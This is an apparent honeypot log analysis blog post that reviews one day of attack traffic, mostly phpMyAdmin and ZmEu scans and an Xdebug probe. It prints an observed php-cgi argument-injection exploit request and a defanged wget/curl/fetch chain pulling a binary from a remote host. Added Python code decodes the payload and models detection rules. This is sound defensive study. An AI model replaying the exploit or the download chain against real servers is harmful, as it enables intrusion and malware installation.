S-Owl

S(ecurity)Owl

Quick analysis of WOWHoneypot logs (Day 36)

This is a quick analysis of the WOWHoneypot log for Monday 2018/07/09 (day 37 of operation).
Today's total was 160 requests, a slight recovery in volume.
The full access log (count, date, method, request target) follows.

34 2018-07-09 GET /
4 2018-07-09 HEAD /
2 2018-07-09 GET /xampp/phpmyadmin/index.php
2 2018-07-09 GET /www/phpMyAdmin/index.php
2 2018-07-09 GET /web/phpMyAdmin/index.php
2 2018-07-09 GET /typo3/phpmyadmin/index.php
2 2018-07-09 GET /tools/phpMyAdmin/index.php
2 2018-07-09 GET /pmd/index.php
2 2018-07-09 GET /pma-old/index.php
2 2018-07-09 GET /pmamy/index.php
2 2018-07-09 GET /pmamy2/index.php
2 2018-07-09 GET /PMA/index.php
2 2018-07-09 GET /pma/index.php
2 2018-07-09 GET /PMA2/index.php
2 2018-07-09 GET /phpMyAdmin/phpMyAdmin/index.php
2 2018-07-09 GET /phpmyadmin/phpmyadmin/index.php
2 2018-07-09 GET /phpMyAdminold/index.php
2 2018-07-09 GET /phpMyAdmin.old/index.php
2 2018-07-09 GET /phpmyadmin-old/index.php
2 2018-07-09 GET /phpMyAdmin/index.php
2 2018-07-09 GET /phpmyadmin/index.php
2 2018-07-09 GET /phpMyadmin_bak/index.php
2 2018-07-09 GET /phpmyadmin2/index.php
2 2018-07-09 GET /phpmyadmin1/index.php
2 2018-07-09 GET /phpmyadmin0/index.php
2 2018-07-09 GET /phpadmin/index.php
2 2018-07-09 GET /mysql/index.php
2 2018-07-09 GET /mysqladmin/index.php
2 2018-07-09 GET /myadmin/index.php
2 2018-07-09 GET /myadmin2/index.php
2 2018-07-09 GET /index.php
2 2018-07-09 GET /db/index.php
2 2018-07-09 GET /dbadmin/index.php
2 2018-07-09 GET /claroline/phpMyAdmin/index.php
2 2018-07-09 GET /admin/PMA/index.php
2 2018-07-09 GET /admin/pma/index.php
2 2018-07-09 GET /admin/phpMyAdmin/index.php
2 2018-07-09 GET /admin/phpmyadmin/index.php
2 2018-07-09 GET /admin/phpmyadmin2/index.php
2 2018-07-09 GET /admin/mysql/index.php
2 2018-07-09 GET /admin/mysql2/index.php
2 2018-07-09 GET /admin/index.php
2 2018-07-09 CONNECT 133.130.126[.]119:43
1 2018-07-09 PROPFIND /
1 2018-07-09 POST /xx.php
1 2018-07-09 POST /xw.php
1 2018-07-09 POST /wuwu11.php
1 2018-07-09 POST /w.php
1 2018-07-09 POST /s.php
1 2018-07-09 POST /sheep.php
1 2018-07-09 POST /db_session.init.php
1 2018-07-09 POST /db.init.php
1 2018-07-09 POST //%63%67%69%2D%62%69%6E/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E
1 2018-07-09 HEAD /phpmyadmin/index.php
1 2018-07-09 HEAD /phpmyadmin/%20index.php
1 2018-07-09 GET /?XDEBUG_SESSION_START=phpstorm
1 2018-07-09 GET /webdav/
1 2018-07-09 GET /w00tw00t.at.blackhats.romanian.anti-sec:)
1 2018-07-09 GET /scripts/setup.php
1 2018-07-09 GET /pma/scripts/setup.php
1 2018-07-09 GET /PMA2012/
1 2018-07-09 GET /pma2012/
1 2018-07-09 GET /PMA2011/
1 2018-07-09 GET /pma2011/
1 2018-07-09 GET /phpMyAdmin/scripts/setup.php
1 2018-07-09 GET /phpmyadmin/scripts/setup.php
1 2018-07-09 GET /phpmyadmin4/
1 2018-07-09 GET /phpMyAdmin-3.0.0.0-all-languages/scripts/setup.php
1 2018-07-09 GET /phpmyadmin3/
1 2018-07-09 GET /phpMyAdmin-2/scripts/setup.php
1 2018-07-09 GET /phpMyAdmin-2.11.11/scripts/setup.php
1 2018-07-09 GET /phpMyAdmin-2.11.11.3/scripts/setup.php
1 2018-07-09 GET /phpMyAdmin-2.10.0.0/scripts/setup.php
1 2018-07-09 GET /phpmyadmin2/
1 2018-07-09 GET /phpma/index.php
1 2018-07-09 GET /mysql/scripts/setup.php
1 2018-07-09 GET /mysqladmin/scripts/setup.php
1 2018-07-09 GET /mysql-admin/index.php
1 2018-07-09 GET /mysql/
1 2018-07-09 GET /MyAdmin/scripts/setup.php
1 2018-07-09 GET /myadmin/scripts/setup.php
1 2018-07-09 GET /db/scripts/setup.php
1 2018-07-09 GET /dbadmin/scripts/setup.php 

The same counts with the phpMyAdmin-related requests (74) and requests for / removed:

2 2018-07-09 GET /pmd/index.php
2 2018-07-09 GET /phpadmin/index.php
2 2018-07-09 GET /mysql/index.php
2 2018-07-09 GET /mysqladmin/index.php
2 2018-07-09 GET /myadmin/index.php
2 2018-07-09 GET /myadmin2/index.php
2 2018-07-09 GET /index.php
2 2018-07-09 GET /db/index.php
2 2018-07-09 GET /dbadmin/index.php
2 2018-07-09 GET /admin/mysql/index.php
2 2018-07-09 GET /admin/mysql2/index.php
2 2018-07-09 GET /admin/index.php
2 2018-07-09 CONNECT 133.130.126[.]119:43
1 2018-07-09 POST /xx.php
1 2018-07-09 POST /xw.php
1 2018-07-09 POST /wuwu11.php
1 2018-07-09 POST /w.php
1 2018-07-09 POST /s.php
1 2018-07-09 POST /sheep.php
1 2018-07-09 POST /db_session.init.php
1 2018-07-09 POST /db.init.php
1 2018-07-09 POST //%63%67%69%2D%62%69%6E/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E
1 2018-07-09 GET /?XDEBUG_SESSION_START=phpstorm
1 2018-07-09 GET /webdav/
1 2018-07-09 GET /w00tw00t.at.blackhats.romanian.anti-sec:)
1 2018-07-09 GET /scripts/setup.php
1 2018-07-09 GET /mysql/scripts/setup.php
1 2018-07-09 GET /mysqladmin/scripts/setup.php
1 2018-07-09 GET /mysql-admin/index.php
1 2018-07-09 GET /mysql/
1 2018-07-09 GET /MyAdmin/scripts/setup.php
1 2018-07-09 GET /myadmin/scripts/setup.php
1 2018-07-09 GET /db/scripts/setup.php
1 2018-07-09 GET /dbadmin/scripts/setup.php

A few other paths also look phpMyAdmin-related (/pmd/, /myadmin/, /mysqladmin/ and so on), but only targets that contain "phpmyadmin" or "pma" (in any case) are excluded as phpMyAdmin-related; everything else stays in the list above.
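The bucketing rule above is easy to get subtly wrong, so here is the classification written out as an added example (my code, not part of the original post or of WOWHoneypot). It parses summary lines in the same "count date method target" shape as the lists above, applies the "phpmyadmin or pma, case-insensitive" substring rule, and shows which borderline paths it does and does not catch. The SAMPLE_SUMMARY is a constructed subset of today's entries, not the full log.

```python
import re
from collections import Counter

# Constructed sample in the same "count date method target" shape as the
# summary lists in the post (a subset of today's entries, not the full log).
SAMPLE_SUMMARY = """\
34 2018-07-09 GET /
4 2018-07-09 HEAD /
2 2018-07-09 GET /xampp/phpmyadmin/index.php
2 2018-07-09 GET /pmd/index.php
2 2018-07-09 GET /PMA/index.php
2 2018-07-09 GET /phpMyAdmin.old/index.php
2 2018-07-09 GET /myadmin/index.php
2 2018-07-09 GET /admin/mysql/index.php
2 2018-07-09 CONNECT 133.130.126[.]119:43
1 2018-07-09 PROPFIND /
1 2018-07-09 POST /xx.php
1 2018-07-09 HEAD /phpmyadmin/%20index.php
1 2018-07-09 GET /phpma/index.php
1 2018-07-09 GET /pma/scripts/setup.php
1 2018-07-09 GET /mysqladmin/scripts/setup.php
"""

LINE_RE = re.compile(
    r"^(?P<count>\d+)\s+(?P<date>\S+)\s+(?P<method>[A-Z]+)\s+(?P<target>\S+)$"
)

# The post's rule: a target is phpMyAdmin-related only if it contains
# "phpmyadmin" or "pma", case-insensitively. Note the edge cases: /phpma/ and
# /pmamy2/ match through "pma"; /pmd/, /myadmin/ and /mysqladmin/ do not.
PMA_RE = re.compile(r"phpmyadmin|pma", re.IGNORECASE)


def parse_summary(text):
    """Turn summary lines into (count, date, method, target) tuples."""
    rows = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            rows.append((int(m["count"]), m["date"], m["method"], m["target"]))
    return rows


def is_pma_related(target):
    return PMA_RE.search(target) is not None


def is_root(target):
    return target == "/"


def bucket_counts(rows):
    """Split request counts into the three buckets the post uses."""
    buckets = Counter()
    for count, _date, _method, target in rows:
        if is_root(target):
            buckets["root"] += count
        elif is_pma_related(target):
            buckets["pma"] += count
        else:
            buckets["other"] += count
    buckets["total"] = sum(count for count, *_ in rows)
    return buckets


def remaining(rows):
    """The 'everything else' list: drops / and phpMyAdmin-related targets."""
    return [(c, d, m, t) for c, d, m, t in rows if not is_root(t) and not is_pma_related(t)]


if __name__ == "__main__":
    rows = parse_summary(SAMPLE_SUMMARY)
    print(dict(bucket_counts(rows)))
    for c, d, m, t in remaining(rows):
        print(c, d, m, t)
```

Run against the full list in the post, the same functions give 74 for the pma bucket and 39 for /, which is how the second list comes out at 47 entries.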

Now, there is a request carrying the characteristic ZmEu scanner signature:

GET /w00tw00t.at.blackhats.romanian.anti-sec:)

The targets requested from the same source IP were:

GET /w00tw00t.at.blackhats.romanian.anti-sec:)
GET /phpmyadmin/scripts/setup.php
GET /phpMyAdmin/scripts/setup.php
GET /mysqladmin/scripts/setup.php
GET /PMA2012/
GET /pma2012/
GET /PMA2011/
GET /pma2011/
GET /phpmyadmin2/
GET /phpmyadmin3/
GET /phpmyadmin4/
GET /pma/scripts/setup.php
GET /myadmin/scripts/setup.php
GET /MyAdmin/scripts/setup.php
GET /mysql/scripts/setup.php
GET /phpMyAdmin-2.10.0.0/scripts/setup.php
GET /phpMyAdmin-2.11.11/scripts/setup.php
GET /phpMyAdmin-2.11.11.3/scripts/setup.php
GET /phpMyAdmin-3.0.0.0-all-languages/scripts/setup.php
GET /dbadmin/scripts/setup.php
GET /db/scripts/setup.php
GET /scripts/setup.php
GET /phpMyAdmin-2/scripts/setup.php
GET /mysql/

It is clearly hunting for phpMyAdmin installs. Some of the paths differ only slightly from one another, but I think it is still fine to treat the whole set as a single attack.
These requests were scanning only; there was no aggressive follow-up that would have had any impact.

The other new request today is the following.

GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36
Connection: close
Accept-Encoding: gzip

Xdebug is a tool for remotely debugging PHP, and this looks like a probe for whether the target can be driven with it. XDEBUG_SESSION_START is the query parameter Xdebug watches for; on a server where Xdebug is loaded with remote debugging enabled and configured to connect back to the requesting client, this single GET makes PHP open a debugger connection to the sender, and the debugging protocol then lets that client evaluate PHP code. One such hit is cheap scanner noise, but it is a reminder that Xdebug should never be left enabled on an internet-facing host.


Today's hunting log is below. A single command from the Apache Magica exploit (the percent-encoded POST to //cgi-bin/php in the list above, which decodes to a php-cgi argument list of -d allow_url_include=on -d safe_mode=off ... -d auto_prepend_file=php://input ... -n, so that the POST body is executed as PHP) was detected as three separate entries: each of the download commands wget, curl and fetch in the one command chain matched a hunting rule on its own.

1 2018-07-09 wget hxxp://mafiagalati.hi2[.]ro/unix ; curl -O hxxp://mafiagalati.hi2[.]ro/unix ; fetch hxxp://mafiagalati.hi2[.]ro/unix
1 2018-07-09 fetch hxxp://mafiagalati.hi2[.]ro/unix
1 2018-07-09 curl -O hxxp://mafiagalati.hi2[.]ro/unix ; fetch hxxp://mafiagalati.hi2[.]ro/unix 
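To make both points concrete, here is an added example in Python (my code, not the post's or WOWHoneypot's). The first half reproduces how a CGI web server turns a query string without an unencoded "=" into argv for php-cgi, decodes the exact POST target from today's log, and flags the php-cgi argument-injection pattern (the bug behind Apache Magica, CVE-2012-1823, and also the "?-s" source-disclosure variant). The second half shows why one command chain yields three hunting entries: the HUNT_PATTERNS are a hypothetical reconstruction of one keyword-anchored rule per download tool, not the real WOWHoneypot rule file, and merge_contained() is one way to log such a payload once. HUNTED_BODY is the defanged command copied from the hunting log above.

```python
import re
from urllib.parse import unquote

# The percent-encoded POST target from today's access list, copied verbatim.
OBSERVED_TARGET = (
    "//%63%67%69%2D%62%69%6E/%70%68%70"
    "?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E"
    "+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66"
    "+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E"
    "+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22"
    "+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65"
    "+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74"
    "+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30"
    "+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30"
    "+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74"
    "+%2D%6E"
)

# php.ini overrides that only make sense if the sender wants the POST body run as PHP.
DANGEROUS_INI = (
    "allow_url_include=on",
    "auto_prepend_file=php://input",
    "disable_functions=",
    "safe_mode=off",
    "open_basedir=none",
)


def split_target(target):
    """Split a request target into raw path and raw query (nothing decoded yet)."""
    path, sep, query = target.partition("?")
    return path, (query if sep else None)


def cgi_argv(raw_query):
    """Mimic the CGI argv rule: if the raw query has no unencoded '=', it is split
    on '+' and each piece is percent-decoded and passed to the CGI binary as an
    argument. Encoding '=' as %3D is what lets the exploit smuggle -d options."""
    if raw_query is None or "=" in raw_query:
        return []
    return [unquote(tok) for tok in raw_query.split("+") if tok]


def classify_php_cgi(target):
    """Decode a request target as php-cgi would see it and flag argument injection."""
    path, raw_query = split_target(target)
    argv = cgi_argv(raw_query)
    flags = [a for a in argv if a.startswith("-")]
    ini_overrides = [argv[i + 1] for i, a in enumerate(argv) if a == "-d" and i + 1 < len(argv)]
    suspicious = bool(flags) and (
        "-n" in flags or "-s" in flags
        or any(o.lower().startswith(d) for o in ini_overrides for d in DANGEROUS_INI)
    )
    return {
        "path": unquote(path),
        "argv": argv,
        "ini_overrides": ini_overrides,
        "php_cgi_argument_injection": suspicious,
    }


# Copy of today's hunted command chain (defanged as in the post).
HUNTED_BODY = (
    "wget hxxp://mafiagalati.hi2[.]ro/unix ; curl -O hxxp://mafiagalati.hi2[.]ro/unix ; "
    "fetch hxxp://mafiagalati.hi2[.]ro/unix"
)

# Hypothetical hunting rules: one regex per download tool, each matching from
# the keyword to the end of the line. Assumed shape, not WOWHoneypot's real rules.
HUNT_PATTERNS = [re.compile(p) for p in (r"wget\s.*", r"curl\s.*", r"fetch\s.*")]


def hunt(body):
    """Run every rule independently and return (start, end) spans. Overlapping
    hits are kept separately, which is why one chain produces three entries."""
    return [(m.start(), m.end()) for pat in HUNT_PATTERNS for m in pat.finditer(body)]


def merge_contained(spans, body):
    """Drop hits nested inside a longer hit, so a single payload is logged once."""
    spans = sorted(set(spans))
    kept = [
        (s, e) for s, e in spans
        if not any(os_ <= s and e <= oe and (os_, oe) != (s, e) for os_, oe in spans)
    ]
    return [body[s:e] for s, e in kept]


if __name__ == "__main__":
    info = classify_php_cgi(OBSERVED_TARGET)
    print(info["path"], "injection:", info["php_cgi_argument_injection"])
    print("php-cgi argv:", " ".join(info["argv"]))
    hits = hunt(HUNTED_BODY)
    print(len(hits), "raw hunting hits ->", len(merge_contained(hits, HUNTED_BODY)), "after merging")
```

The detection deliberately keys on the argv shape rather than on the literal encoded string, so a variant that reorders the -d options or uses different percent-encoding still trips it, while an ordinary "?id=1" query (which contains a raw "=") produces an empty argv and is ignored.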


That's all for today.